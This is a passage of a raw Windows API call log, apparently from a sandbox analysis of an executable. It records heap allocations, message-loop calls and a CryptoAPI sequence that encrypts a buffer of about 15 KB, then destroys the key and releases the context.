lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0034.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0034.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0034.243] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0034.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0034.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0034.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0034.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0034.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0034.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0034.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0034.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0034.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0034.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0034.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0034.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0034.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0034.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0034.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0034.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0034.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0034.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0034.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0034.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0034.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0034.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0034.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0034.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0034.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0034.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0034.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0034.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0034.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0034.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0034.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0034.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0034.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0034.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0034.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0034.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0034.246] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0034.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0034.246] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da308, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da308*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0034.246] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.246] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.246] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.247] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.247] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.247] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.247] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.247] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.247] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0034.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0034.247] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.247] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0034.247] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.247] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.247] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.247] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0034.247] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.247] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0034.247] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0034.248] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.248] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x3c34, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x3c40) returned 1 [0034.279] CharLowerBuffW (in: lpsz="byte[15425]", cchLength=0xb | out: lpsz="byte[15425]") returned 0xb [0034.279] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.279] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.279] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9604d8*, pdwDataLen=0x6ae220*=0x3c34, dwBufLen=0x3c40 | out: pbData=0x9604d8*, pdwDataLen=0x6ae220*=0x3c40) returned 1 [0034.281] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0034.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.281] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.281] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.284] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0034.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.284] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.284] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.284] CryptDestroyKey (hKey=0x7c2200) returned 1 [0034.284] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0034.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.284] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.284] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.285] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0034.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.285] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.285] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.285] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.285] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0034.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.285] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.285] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0034.285] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.285] FreeLibrary (hLibModule=0x754b0000) returned 1 [0034.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0034.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0034.383] TranslateMessage (lpMsg=0x6aed6c) returned 0 [0034.383] DispatchMessageW (lpMsg=0x6aed6c) returned 0x0 [0034.383] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ae408) returned 1 [0034.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0034.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.384] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0034.384] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0034.384] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0034.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0034.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0034.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0034.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c928 [0034.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889610 [0034.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbc8 [0034.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0034.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cce8 [0034.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a78 [0034.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0034.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0034.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.385] CloseHandle (hObject=0x128) returned 1 [0034.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0034.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0034.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0034.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 